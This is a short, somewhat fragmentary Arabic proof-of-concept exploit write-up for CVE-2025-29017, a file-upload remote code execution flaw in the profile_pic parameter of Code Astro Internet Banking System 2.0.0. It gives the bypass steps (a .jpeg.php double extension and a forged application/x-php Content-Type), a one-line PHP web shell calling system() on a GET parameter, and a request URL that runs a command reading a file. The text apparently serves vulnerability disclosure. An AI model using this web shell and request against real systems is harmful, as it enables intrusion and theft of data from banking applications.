
استغلال لإثبات المفهوم (PoC) لثغرة CVE-2025-29017، يوضح تنفيذ تعليمات برمجية عن بُعد عبر رفع ملف خبيث في نظام Code Astro Internet Banking System 2.0.0.
توجد ثغرة تنفيذ أوامر عن بُعد (RCE) في نظام Code Astro للخدمات المصرفية عبر الإنترنت 2.0.0 بسبب عدم التحقق السليم من صحة رفع الملفات في المعامل profile_pic داخل pages_view_client.php. يمكن للمهاجمين تجاوز فحوصات الأمان عن طريق تعديل طلب الرفع، مما يؤدي إلى تنفيذ تعليمات برمجية عشوائية.
profile_pic في pages_view_client.php


.jpeg.php)، وعدّل رأس Content-Type إلى application/x-php، وأضف كود PHP ضار:<?php system($_GET['cmd']); ?>


/admin/dist/img/:http://IP:PORT/InternetBanking-php/admin/dist/img/image.jpeg.php?cmd=type C:\Users\file.txt
